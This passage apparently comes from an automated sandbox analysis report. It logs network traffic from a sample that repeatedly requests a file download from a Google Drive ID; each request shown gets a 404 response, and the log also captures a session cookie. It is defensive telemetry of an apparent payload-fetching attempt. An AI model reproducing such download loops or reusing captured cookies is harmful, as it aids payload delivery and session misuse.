      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQRxjkIGfA5tlLHI4sB_wrr9_aJ4a90vwOxRb3-tTucYZXp2uBX902t0BkusxBLWsjIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:32:08 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-aA_ZR0f0BCBgdPSoN7LX8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerSet-Cookie: 
NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU; expires=Sat, 12-Jul-2025 14:32:08 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6nQVZzX7OjgneRLkuPxLFJSj3gieiGHHX7Yx6rofX72iClNoI2EAetFIedSoc1pP9JContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:32:19 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-QoWLUwcE8tb47_MzPxWpaA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5BU9c99SYDNTRGFvVENQyj46YaRcBipwEyxNsKmO8-d16nHi1RXCQmXEPmY8FKIEDtContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:32:31 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-IKIsCl_XsgTFIpEaBBGV0w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC77vVWG8zv1oikIQqRX_5zPlkDD9ufthX9c9uPCe3w68TtvECDDF_tqj7IExgwe1FTQf6_IX_sContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:32:42 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-_RsSWx8ndAptCJ5WgTnBew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC41J0T9rcwAmomBrR5aj2KfVX_uwSnsubyD5rR_edViruEMXNBweUxlqUOwtQh9uNGpContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:32:53 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-6q3oQVu49o-Zlobz29u_iw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgS7PyZKIdu5fsvm96mx7w5dvyIfBsgC8eY2aGpW8MzvaqTUz6Leup5ZZjrsgqP1pmE3Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:33:04 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-fKS1nCBZopWdm8Ixn1kRZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSqgw4Xcnoq_mmC0w82Es0CkINiBSNv3gdMKqZSIRhVhWRfYxEfbngKg-jXGBbBOiX8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:33:15 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-boktPEdIAOX-cEICFdwjaw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 